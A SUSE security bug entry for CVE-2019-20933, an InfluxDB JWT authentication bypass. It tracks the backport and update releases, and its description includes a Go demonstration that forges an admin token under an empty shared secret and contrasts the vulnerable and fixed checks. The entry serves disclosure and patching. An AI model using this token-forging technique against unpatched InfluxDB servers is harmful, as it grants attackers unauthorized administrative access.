Bug 1178988 - (CVE-2019-20933) VUL-0: CVE-2019-20933: influxdb: authentication bypass in the authenticate function in services/httpd/handler.go
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other
OS: Other
Priority: P2 - High
Severity: Major
Target Milestone: ---
Assigned To: Security Team bot
https://smash.suse.de/issue/272037/
CVSSv3.1:SUSE:CVE-2019-20933:7.5:(AV:...
Depends on:
Blocks:
Reported: 2020-11-19 16:07 UTC by Alexandros Toptsoglou
Modified: 2021-11-09 20:35 UTC (History)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Description Alexandros Toptsoglou 2020-11-19 16:07:43 UTC
CVE-2019-20933

InfluxDB before 1.7.6 has an authentication bypass vulnerability in the
authenticate function in services/httpd/handler.go because a JWT token may have
an empty SharedSecret (aka shared secret).

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20933
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933
https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0
https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6
https://github.com/influxdata/influxdb/issues/12927
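The bug is easier to see in code than in the CVE sentence. The block below is an added, self-contained illustration written for this page; it is not InfluxDB's handler.go and it is not the upstream patch. It reimplements HS256 JWT signing and verification with the Go standard library so that it runs offline, models the pre-1.7.6 bearer-token path as authenticateVulnerable (verify the token against whatever SharedSecret holds, including the empty default), and models the 1.7.6 fix as authenticateFixed (refuse bearer auth outright when no shared secret is configured, which is how I read the linked commit). The type and function names (Config, claims, mintHS256, verifyHS256, authenticateVulnerable, authenticateFixed), the fixed timestamp and the sample secret "s3cret" are all constructed for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
	"time"
)

// Config holds the one setting that matters here: the [http] shared-secret
// value, which is empty unless the operator sets it. (Constructed for this
// example; not InfluxDB's real Config struct.)
type Config struct {
	SharedSecret string
}

// claims is the subset of the JWT payload the handler cares about.
type claims struct {
	Username string `json:"username"`
	Exp      int64  `json:"exp"`
}

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// mintHS256 builds header.payload.signature signed with HMAC-SHA256 under key.
// An attacker who knows the server's key is "" simply calls this with key == "".
func mintHS256(c claims, key string) (string, error) {
	hdr, err := json.Marshal(map[string]string{"alg": "HS256", "typ": "JWT"})
	if err != nil {
		return "", err
	}
	body, err := json.Marshal(c)
	if err != nil {
		return "", err
	}
	signing := b64(hdr) + "." + b64(body)
	mac := hmac.New(sha256.New, []byte(key))
	mac.Write([]byte(signing))
	return signing + "." + b64(mac.Sum(nil)), nil
}

// verifyHS256 does what a JWT library does when handed the configured key:
// an HMAC over the empty key is a perfectly valid HMAC, so an empty key
// verifies tokens that anyone can mint.
func verifyHS256(tok, key string, now time.Time) (claims, error) {
	var c claims
	parts := strings.Split(tok, ".")
	if len(parts) != 3 {
		return c, errors.New("malformed token")
	}
	var hdr struct {
		Alg string `json:"alg"`
	}
	hb, err := base64.RawURLEncoding.DecodeString(parts[0])
	if err != nil || json.Unmarshal(hb, &hdr) != nil || hdr.Alg != "HS256" {
		return c, errors.New("unsupported or malformed header")
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil {
		return c, errors.New("malformed signature")
	}
	mac := hmac.New(sha256.New, []byte(key))
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) {
		return c, errors.New("signature mismatch")
	}
	pb, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil || json.Unmarshal(pb, &c) != nil {
		return c, errors.New("malformed claims")
	}
	if c.Exp == 0 || now.Unix() >= c.Exp {
		return c, errors.New("token expired or missing exp")
	}
	return c, nil
}

// authenticateVulnerable models InfluxDB before 1.7.6: the bearer token is
// checked against SharedSecret whatever its value, so the empty default
// lets an unauthenticated client forge a token for any username.
func authenticateVulnerable(cfg Config, token string, now time.Time) (string, error) {
	c, err := verifyHS256(token, cfg.SharedSecret, now)
	if err != nil {
		return "", err
	}
	return c.Username, nil
}

// authenticateFixed models the 1.7.6 change as I read the linked commit:
// bearer auth is refused entirely when no shared secret is configured.
func authenticateFixed(cfg Config, token string, now time.Time) (string, error) {
	if cfg.SharedSecret == "" {
		return "", errors.New("bearer auth disabled")
	}
	return authenticateVulnerable(cfg, token, now)
}

func main() {
	now := time.Unix(1700000000, 0) // fixed clock so the run is reproducible
	forged, _ := mintHS256(claims{Username: "admin", Exp: now.Unix() + 3600}, "")
	u, err := authenticateVulnerable(Config{}, forged, now)
	fmt.Println("vulnerable, empty secret:", u, err)
	u, err = authenticateFixed(Config{}, forged, now)
	fmt.Println("fixed, empty secret:     ", u, err)
	legit, _ := mintHS256(claims{Username: "admin", Exp: now.Unix() + 3600}, "s3cret")
	u, err = authenticateFixed(Config{SharedSecret: "s3cret"}, legit, now)
	fmt.Println("fixed, real secret:      ", u, err)
}
```

Running the block prints that the vulnerable path accepts the forged admin token while the fixed path rejects it, and that a token signed with the real secret still works after the fix. The practical caveat for anyone stuck on an unpatched build: the bypass only needs the secret to be empty, so setting a long random shared-secret closes it, but the proper fix is the version bump, since the patched code also stops an operator from silently running with bearer auth "enabled" under a key of zero bytes.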
Comment 1 Alexandros Toptsoglou 2020-11-19 16:08:34 UTC
Tracked Cloud 7, 8, 9 as affected. OpenSUSE Leap 15.2 and Factory are already fixed.
Comment 3 Johannes Grassler 2020-11-24 10:58:28 UTC
Patch backported and tested against Cloud 7, Cloud 8 and Cloud 9. Requests created for all three:

* https://build.opensuse.org/request/show/850397 (Cloud 7)
* https://build.opensuse.org/request/show/850398 (Cloud 8)
* https://build.opensuse.org/request/show/850411 (Cloud 9)
Comment 6 Swamp Workflow Management 2020-12-04 17:18:11 UTC
SUSE-SU-2020:3624-1: An update that fixes 5 vulnerabilities and contains one feature is now available.

Category: security (moderate)
Bug References: 1005886,1170479,1177120,1178243,1178988
CVE References: CVE-2016-8611,CVE-2019-20933,CVE-2019-9740,CVE-2020-24303,CVE-2020-26137
JIRA References: SOC-11240
Sources used:
SUSE OpenStack Cloud 7 (src):    crowbar-openstack-4.0+git.1604938545.30c10db18-9.77.1, grafana-6.7.4-1.20.1, influxdb-1.2.4-5.1, python-urllib3-1.16-3.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 9 Swamp Workflow Management 2020-12-21 17:16:49 UTC
SUSE-SU-2020:3896-1: An update that solves 6 vulnerabilities, contains one feature and has one errata is now available.

Category: security (important)
Bug References: 1117080,1125815,1132174,1132323,1178243,1178988,1179161
CVE References: CVE-2016-10745,CVE-2018-17954,CVE-2019-10906,CVE-2019-20933,CVE-2019-8341,CVE-2020-24303
JIRA References: SOC-11240
Sources used:
SUSE OpenStack Cloud Crowbar 8 (src):    crowbar-core-5.0+git.1606840757.839a64745-3.47.1, crowbar-openstack-5.0+git.1604938523.ded915845-4.46.1, grafana-6.7.4-4.15.1, influxdb-1.3.4-4.3.1, openstack-heat-templates-0.0.0+git.1605509190.64f020b-3.18.1, openstack-nova-16.1.9~dev77-3.42.1, openstack-nova-doc-16.1.9~dev77-3.42.1, python-Jinja2-2.9.6-3.3.1, rubygem-crowbar-client-3.9.3-3.15.1
SUSE OpenStack Cloud 8 (src):    grafana-6.7.4-4.15.1, influxdb-1.3.4-4.3.1, openstack-heat-templates-0.0.0+git.1605509190.64f020b-3.18.1, openstack-nova-16.1.9~dev77-3.42.1, openstack-nova-doc-16.1.9~dev77-3.42.1, python-Jinja2-2.9.6-3.3.1, venv-openstack-aodh-5.1.1~dev7-12.30.1, venv-openstack-barbican-5.0.2~dev3-12.31.1, venv-openstack-ceilometer-9.0.8~dev7-12.28.1, venv-openstack-cinder-11.2.3~dev29-14.32.1, venv-openstack-designate-5.0.3~dev7-12.29.1, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.26.1, venv-openstack-glance-15.0.3~dev3-12.29.1, venv-openstack-heat-9.0.8~dev22-12.31.1, venv-openstack-ironic-9.1.8~dev8-12.31.1, venv-openstack-keystone-12.0.4~dev11-11.32.1, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.30.1, venv-openstack-manila-5.1.1~dev5-12.35.1, venv-openstack-monasca-2.2.2~dev1-11.26.1, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.26.1, venv-openstack-murano-4.0.2~dev2-12.26.1, venv-openstack-neutron-11.0.9~dev69-13.34.1, venv-openstack-nova-16.1.9~dev77-11.32.1, venv-openstack-octavia-1.0.6~dev3-12.31.1, venv-openstack-sahara-7.0.5~dev4-11.30.1, venv-openstack-trove-8.0.2~dev2-11.30.1
HPE Helion Openstack 8 (src):    grafana-6.7.4-4.15.1, influxdb-1.3.4-4.3.1, openstack-heat-templates-0.0.0+git.1605509190.64f020b-3.18.1, openstack-nova-16.1.9~dev77-3.42.1, openstack-nova-doc-16.1.9~dev77-3.42.1, python-Jinja2-2.9.6-3.3.1, venv-openstack-aodh-5.1.1~dev7-12.30.1, venv-openstack-barbican-5.0.2~dev3-12.31.1, venv-openstack-ceilometer-9.0.8~dev7-12.28.1, venv-openstack-cinder-11.2.3~dev29-14.32.1, venv-openstack-designate-5.0.3~dev7-12.29.1, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.26.1, venv-openstack-glance-15.0.3~dev3-12.29.1, venv-openstack-heat-9.0.8~dev22-12.31.1, venv-openstack-ironic-9.1.8~dev8-12.31.1, venv-openstack-keystone-12.0.4~dev11-11.32.1, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.30.1, venv-openstack-manila-5.1.1~dev5-12.35.1, venv-openstack-monasca-2.2.2~dev1-11.26.1, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.26.1, venv-openstack-murano-4.0.2~dev2-12.26.1, venv-openstack-neutron-11.0.9~dev69-13.34.1, venv-openstack-nova-16.1.9~dev77-11.32.1, venv-openstack-octavia-1.0.6~dev3-12.31.1, venv-openstack-sahara-7.0.5~dev4-11.30.1, venv-openstack-trove-8.0.2~dev2-11.30.1
Comment 10 Swamp Workflow Management 2020-12-21 17:18:35 UTC
SUSE-SU-2020:3897-1: An update that solves 7 vulnerabilities, contains 8 features and has one errata is now available.

Category: security (important)
Bug References: 1125815,1132174,1132323,1160851,1177120,1177611,1178243,1178988
CVE References: CVE-2016-10745,CVE-2019-10906,CVE-2019-20933,CVE-2019-8341,CVE-2020-24303,CVE-2020-26137,CVE-2020-5390
JIRA References: SCRD-8681,SOC-11184,SOC-11240,SOC-11391,SOC-7751,SOC-8764,SOC-9178,SOC-9781
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    crowbar-core-6.0+git.1606314264.bf9ada813-3.31.2, crowbar-openstack-6.0+git.1604573541.bb18c172d-3.28.3, grafana-6.7.4-3.20.1, influxdb-1.3.8-4.3.3, openstack-cinder-13.0.10~dev20-3.28.2, openstack-heat-11.0.4~dev4-3.19.2, openstack-heat-gbp-12.0.1~dev2-3.3.4, openstack-heat-templates-0.0.0+git.1605509190.64f020b6-3.9.3, openstack-horizon-plugin-gbp-ui-12.0.1~dev3-3.3.4, openstack-ironic-python-agent-3.3.4~dev6-3.19.4, openstack-manila-7.4.2~dev57-4.30.2, openstack-neutron-13.0.8~dev135-3.31.2, openstack-neutron-gbp-12.0.1~dev5-3.19.4, openstack-neutron-vpnaas-13.0.2~dev6-3.9.2, openstack-nova-18.3.1~dev77-3.31.2, python-Jinja2-2.10.1-3.3.3, python-pysaml2-4.5.0-4.3.3, python-pytest-3.7.4-3.3.3, python-urllib3-1.23-3.15.3, release-notes-suse-openstack-cloud-9.20200917-3.24.3, spark-2.2.3-5.3.3
SUSE OpenStack Cloud 9 (src):    ardana-cassandra-9.0+git.1600802664.7e480a2-3.6.2, ardana-mq-9.0+git.1605174486.a78ddce-3.19.2, ardana-osconfig-9.0+git.1601621747.a87e5a0-3.22.2, ardana-tempest-9.0+git.1603378983.fc0bca9-3.19.2, grafana-6.7.4-3.20.1, influxdb-1.3.8-4.3.3, openstack-cinder-13.0.10~dev20-3.28.2, openstack-heat-11.0.4~dev4-3.19.2, openstack-heat-gbp-12.0.1~dev2-3.3.4, openstack-heat-templates-0.0.0+git.1605509190.64f020b6-3.9.3, openstack-horizon-plugin-gbp-ui-12.0.1~dev3-3.3.4, openstack-ironic-python-agent-3.3.4~dev6-3.19.4, openstack-manila-7.4.2~dev57-4.30.2, openstack-neutron-13.0.8~dev135-3.31.2, openstack-neutron-gbp-12.0.1~dev5-3.19.4, openstack-neutron-vpnaas-13.0.2~dev6-3.9.2, openstack-nova-18.3.1~dev77-3.31.2, python-Jinja2-2.10.1-3.3.3, python-pysaml2-4.5.0-4.3.3, python-pytest-3.7.4-3.3.3, python-urllib3-1.23-3.15.3, release-notes-suse-openstack-cloud-9.20200917-3.24.3, spark-2.2.3-5.3.3, venv-openstack-barbican-7.0.1~dev24-3.21.2, venv-openstack-cinder-13.0.10~dev20-3.24.2, venv-openstack-designate-7.0.2~dev2-3.21.2, venv-openstack-glance-17.0.1~dev30-3.19.2, venv-openstack-heat-11.0.4~dev4-3.21.2, venv-openstack-horizon-14.1.1~dev7-4.23.2, venv-openstack-ironic-11.1.5~dev16-4.19.2, venv-openstack-keystone-14.2.1~dev4-3.21.2, venv-openstack-magnum-7.2.1~dev1-4.21.2, venv-openstack-manila-7.4.2~dev57-3.25.2, venv-openstack-monasca-2.7.1~dev10-3.19.2, venv-openstack-monasca-ceilometer-1.8.2~dev3-3.21.2, venv-openstack-neutron-13.0.8~dev135-6.23.2, venv-openstack-nova-18.3.1~dev77-3.23.2, venv-openstack-octavia-3.2.3~dev7-4.21.2, venv-openstack-sahara-9.0.2~dev15-3.21.2, venv-openstack-swift-2.19.2~dev48-2.16.2
Comment 11 Wolfgang Frisch 2021-05-06 16:44:29 UTC
Released.